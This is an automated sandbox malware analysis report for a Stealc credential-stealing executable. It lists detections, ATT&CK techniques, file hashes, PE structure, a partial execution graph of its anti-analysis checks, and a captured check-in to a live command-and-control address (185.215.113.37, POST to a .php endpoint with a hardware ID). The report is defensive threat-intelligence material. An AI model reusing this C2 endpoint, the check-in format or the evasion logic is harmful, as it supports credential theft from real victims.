                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6448, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00FC9600
                Source: file.exeBinary or memory string: u@Program Manager
                Source: file.exe, 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: @Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00FC7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00FC7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00FC7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00FC7A30

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6448, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6448, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem324
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe47%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpD_file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmptrue
                  unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1291738753.0000000000DCE000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  unknown
                  http://185.215.113.37/e2b1563c6670f193.phpX_file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmptrue
                    unknown
                    http://185.215.113.37/3Ofile.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmptrue
                      unknown
                      http://185.215.113.37/e2b1563c6670f193.php$file.exe, 00000000.00000002.1291738753.0000000000E43000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://185.215.113.37gfile.exe, 00000000.00000002.1291738753.0000000000DCE000.00000004.00000020.00020000.00000000.sdmptrue
                          unknown
                          http://185.215.113.37/e2b1563c6670f193.php8_Tvfile.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmptrue
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            unknownPortugal
                            206894WHOLESALECONNECTIONSNLtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1540505
                            Start date and time:2024-10-23 20:54:07 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 9s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 86
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947854852523852
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'911'808 bytes
                            MD5:de1624f6c5d98d559c64c9c30359b942
                            SHA1:b02c82eeb4d1e7b768633ef276f182b653db29fc
                            SHA256:3a98e0f2785d57188cab067e1c48a2355d69212f432380d94315db75d1be30ce
                            SHA512:804cba17f917d2e96d6da73df0effe38548970d187da02b8e35f13bdb8ea144aa2b5f2d04a909290d64c01b332cff3418bfb949419fd1e40c4b107100ca86ebd
                            SSDEEP:49152:wCU6bxg4GWZLVkWdnFjfrqFoG+dgRo50CHvpTHv8M:wCU6bW4GukhR7CHa
                            TLSH:6195331C4B65C735DED51279A7B714D4EBF9CF622BEA496BCE39813842C38883345AE0
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xac7000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007F2A68E0D7EAh
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x22800c0f6193c923c9f934bee92c25548c491unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2bb0000x200e42f9513660ce256b57eb9013c8b7ce8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            sacriosm0x5190000x1ad0000x1aca00904170064b081c41be2ceac36277faedFalse0.9950929799139691data7.954815877107788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            bxtvqvzl0x6c60000x10000x40067e97bb3b3c59faa2dbfe2cc3ea0e4feFalse0.7353515625data6.095704241402358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6c70000x30000x22000b62b2d2033ce3729c52e031602097e4False0.06456801470588236DOS executable (COM)0.7040644891945353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLLImport
                            kernel32.dlllstrcpy
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-23T20:55:05.940663+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749699185.215.113.3780TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Oct 23, 2024 20:55:04.723707914 CEST4969980192.168.2.7185.215.113.37
                            Oct 23, 2024 20:55:04.730773926 CEST8049699185.215.113.37192.168.2.7
                            Oct 23, 2024 20:55:04.730959892 CEST4969980192.168.2.7185.215.113.37
                            Oct 23, 2024 20:55:04.731997967 CEST4969980192.168.2.7185.215.113.37
                            Oct 23, 2024 20:55:04.737562895 CEST8049699185.215.113.37192.168.2.7
                            Oct 23, 2024 20:55:05.647269964 CEST8049699185.215.113.37192.168.2.7
                            Oct 23, 2024 20:55:05.647363901 CEST4969980192.168.2.7185.215.113.37
                            Oct 23, 2024 20:55:05.649559975 CEST4969980192.168.2.7185.215.113.37
                            Oct 23, 2024 20:55:05.656814098 CEST8049699185.215.113.37192.168.2.7
                            Oct 23, 2024 20:55:05.940581083 CEST8049699185.215.113.37192.168.2.7
                            Oct 23, 2024 20:55:05.940663099 CEST4969980192.168.2.7185.215.113.37
                            Oct 23, 2024 20:55:07.636113882 CEST4969980192.168.2.7185.215.113.37
                            • 185.215.113.37
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749699185.215.113.37806448C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 23, 2024 20:55:04.731997967 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 23, 2024 20:55:05.647269964 CEST203INHTTP/1.1 200 OK
                            Date: Wed, 23 Oct 2024 18:55:05 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 23, 2024 20:55:05.649559975 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 31 38 30 31 45 34 43 42 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a
                            Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="hwid"CD1801E4CB7B1953448019------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="build"doma------IDBKKKKKFBGDGDHIDBGH--
                            Oct 23, 2024 20:55:05.940581083 CEST210INHTTP/1.1 200 OK
                            Date: Wed, 23 Oct 2024 18:55:05 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Target ID:0
                            Start time:14:55:00
                            Start date:23/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xfb0000
                            File size:1'911'808 bytes
                            MD5 hash:DE1624F6C5D98D559C64C9C30359B942
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:7.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10.1%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
                              execution_graph 13402 fc69f0 13447 fb2260 13402->13447 13426 fc6a64 13427 fca9b0 4 API calls 13426->13427 13428 fc6a6b 13427->13428 13429 fca9b0 4 API calls 13428->13429 13430 fc6a72 13429->13430 13431 fca9b0 4 API calls 13430->13431 13432 fc6a79 13431->13432 13433 fca9b0 4 API calls 13432->13433 13434 fc6a80 13433->13434 13599 fca8a0 13434->13599 13436 fc6b0c 13603 fc6920 GetSystemTime 13436->13603 13437 fc6a89 13437->13436 13439 fc6ac2 OpenEventA 13437->13439 13441 fc6af5 CloseHandle Sleep 13439->13441 13443 fc6ad9 13439->13443 13444 fc6b0a 13441->13444 13446 fc6ae1 CreateEventA 13443->13446 13444->13437 13446->13436 13800 fb45c0 13447->13800 13449 fb2274 13450 fb45c0 2 API calls 13449->13450 13451 fb228d 13450->13451 13452 fb45c0 2 API calls 13451->13452 13453 fb22a6 13452->13453 13454 fb45c0 2 API calls 13453->13454 13455 fb22bf 13454->13455 13456 fb45c0 2 API calls 13455->13456 13457 fb22d8 13456->13457 13458 fb45c0 2 API calls 13457->13458 13459 fb22f1 13458->13459 13460 fb45c0 2 API calls 13459->13460 13461 fb230a 13460->13461 13462 fb45c0 2 API calls 13461->13462 13463 fb2323 13462->13463 13464 fb45c0 2 API calls 13463->13464 13465 fb233c 13464->13465 13466 fb45c0 2 API calls 13465->13466 13467 fb2355 13466->13467 13468 fb45c0 2 API calls 13467->13468 13469 fb236e 13468->13469 13470 fb45c0 2 API calls 13469->13470 13471 fb2387 13470->13471 13472 fb45c0 2 API calls 13471->13472 13473 fb23a0 13472->13473 13474 fb45c0 2 API calls 13473->13474 13475 fb23b9 13474->13475 13476 fb45c0 2 API calls 13475->13476 13477 fb23d2 13476->13477 13478 fb45c0 2 API calls 13477->13478 13479 fb23eb 13478->13479 13480 fb45c0 2 API calls 13479->13480 13481 fb2404 13480->13481 13482 fb45c0 2 API calls 13481->13482 13483 fb241d 13482->13483 13484 fb45c0 2 API calls 13483->13484 13485 fb2436 13484->13485 13486 fb45c0 2 API calls 13485->13486 13487 fb244f 13486->13487 13488 fb45c0 2 API calls 13487->13488 13489 fb2468 13488->13489 13490 fb45c0 2 API calls 13489->13490 13491 fb2481 13490->13491 13492 fb45c0 2 API calls 13491->13492 13493 fb249a 13492->13493 13494 fb45c0 2 API calls 13493->13494 13495 fb24b3 13494->13495 13496 fb45c0 2 API calls 13495->13496 13497 fb24cc 13496->13497 13498 fb45c0 2 API calls 13497->13498 13499 fb24e5 13498->13499 13500 fb45c0 2 API calls 13499->13500 13501 fb24fe 13500->13501 13502 fb45c0 2 API calls 13501->13502 13503 fb2517 13502->13503 13504 fb45c0 2 API calls 13503->13504 13505 fb2530 13504->13505 13506 fb45c0 2 API calls 13505->13506 13507 fb2549 13506->13507 13508 fb45c0 2 API calls 13507->13508 13509 fb2562 13508->13509 13510 fb45c0 2 API calls 13509->13510 13511 fb257b 13510->13511 13512 fb45c0 2 API calls 13511->13512 13513 fb2594 13512->13513 13514 fb45c0 2 API calls 13513->13514 13515 fb25ad 13514->13515 13516 fb45c0 2 API calls 13515->13516 13517 fb25c6 13516->13517 13518 fb45c0 2 API calls 13517->13518 13519 fb25df 13518->13519 13520 fb45c0 2 API calls 13519->13520 13521 fb25f8 13520->13521 13522 fb45c0 2 API calls 13521->13522 13523 fb2611 13522->13523 13524 fb45c0 2 API calls 13523->13524 13525 fb262a 13524->13525 13526 fb45c0 2 API calls 13525->13526 13527 fb2643 13526->13527 13528 fb45c0 2 API calls 13527->13528 13529 fb265c 13528->13529 13530 fb45c0 2 API calls 13529->13530 13531 fb2675 13530->13531 13532 fb45c0 2 API calls 13531->13532 13533 fb268e 13532->13533 13534 fc9860 13533->13534 13805 fc9750 GetPEB 13534->13805 13536 fc9868 13537 fc987a 13536->13537 13538 fc9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13536->13538 13543 fc988c 21 API calls 13537->13543 13539 fc9b0d 13538->13539 13540 fc9af4 GetProcAddress 13538->13540 13541 fc9b46 13539->13541 13542 fc9b16 GetProcAddress GetProcAddress 13539->13542 13540->13539 13544 fc9b4f GetProcAddress 13541->13544 13545 fc9b68 13541->13545 13542->13541 13543->13538 13544->13545 13546 fc9b89 13545->13546 13547 fc9b71 GetProcAddress 13545->13547 13548 fc6a00 13546->13548 13549 fc9b92 GetProcAddress GetProcAddress 13546->13549 13547->13546 13550 fca740 13548->13550 13549->13548 13551 fca750 13550->13551 13552 fc6a0d 13551->13552 13553 fca77e lstrcpy 13551->13553 13554 fb11d0 13552->13554 13553->13552 13555 fb11e8 13554->13555 13556 fb120f ExitProcess 13555->13556 13557 fb1217 13555->13557 13558 fb1160 GetSystemInfo 13557->13558 13559 fb117c ExitProcess 13558->13559 13560 fb1184 13558->13560 13561 fb1110 GetCurrentProcess VirtualAllocExNuma 13560->13561 13562 fb1149 13561->13562 13563 fb1141 ExitProcess 13561->13563 13806 fb10a0 VirtualAlloc 13562->13806 13566 fb1220 13810 fc89b0 13566->13810 13569 fb129a 13572 fc6770 GetUserDefaultLangID 13569->13572 13570 fb1249 __aulldiv 13570->13569 13571 fb1292 ExitProcess 13570->13571 13573 fc6792 13572->13573 13574 fc67d3 13572->13574 13573->13574 13575 fc67ad ExitProcess 13573->13575 13576 fc67cb ExitProcess 13573->13576 13577 fc67b7 ExitProcess 13573->13577 13578 fc67c1 ExitProcess 13573->13578 13579 fc67a3 ExitProcess 13573->13579 13580 fb1190 13574->13580 13576->13574 13581 fc78e0 3 API calls 13580->13581 13582 fb119e 13581->13582 13583 fb11cc 13582->13583 13584 fc7850 3 API calls 13582->13584 13587 fc7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13583->13587 13585 fb11b7 13584->13585 13585->13583 13586 fb11c4 ExitProcess 13585->13586 13588 fc6a30 13587->13588 13589 fc78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13588->13589 13590 fc6a43 13589->13590 13591 fca9b0 13590->13591 13812 fca710 13591->13812 13593 fca9c1 lstrlen 13595 fca9e0 13593->13595 13594 fcaa18 13813 fca7a0 13594->13813 13595->13594 13597 fca9fa lstrcpy lstrcat 13595->13597 13597->13594 13598 fcaa24 13598->13426 13600 fca8bb 13599->13600 13601 fca90b 13600->13601 13602 fca8f9 lstrcpy 13600->13602 13601->13437 13602->13601 13817 fc6820 13603->13817 13605 fc698e 13606 fc6998 sscanf 13605->13606 13846 fca800 13606->13846 13608 fc69aa SystemTimeToFileTime SystemTimeToFileTime 13609 fc69e0 13608->13609 13611 fc69ce 13608->13611 13612 fc5b10 13609->13612 13610 fc69d8 ExitProcess 13611->13609 13611->13610 13613 fc5b1d 13612->13613 13614 fca740 lstrcpy 13613->13614 13615 fc5b2e 13614->13615 13848 fca820 lstrlen 13615->13848 13618 fca820 2 API calls 13619 fc5b64 13618->13619 13620 fca820 2 API calls 13619->13620 13621 fc5b74 13620->13621 13852 fc6430 13621->13852 13624 fca820 2 API calls 13625 fc5b93 13624->13625 13626 fca820 2 API calls 13625->13626 13627 fc5ba0 13626->13627 13628 fca820 2 API calls 13627->13628 13629 fc5bad 13628->13629 13630 fca820 2 API calls 13629->13630 13631 fc5bf9 13630->13631 13861 fb26a0 13631->13861 13639 fc5cc3 13640 fc6430 lstrcpy 13639->13640 13641 fc5cd5 13640->13641 13642 fca7a0 lstrcpy 13641->13642 13643 fc5cf2 13642->13643 13644 fca9b0 4 API calls 13643->13644 13645 fc5d0a 13644->13645 13646 fca8a0 lstrcpy 13645->13646 13647 fc5d16 13646->13647 13648 fca9b0 4 API calls 13647->13648 13649 fc5d3a 13648->13649 13650 fca8a0 lstrcpy 13649->13650 13651 fc5d46 13650->13651 13652 fca9b0 4 API calls 13651->13652 13653 fc5d6a 13652->13653 13654 fca8a0 lstrcpy 13653->13654 13655 fc5d76 13654->13655 13656 fca740 lstrcpy 13655->13656 13657 fc5d9e 13656->13657 14587 fc7500 GetWindowsDirectoryA 13657->14587 13660 fca7a0 lstrcpy 13661 fc5db8 13660->13661 14597 fb4880 13661->14597 13663 fc5dbe 14742 fc17a0 13663->14742 13665 fc5dc6 13666 fca740 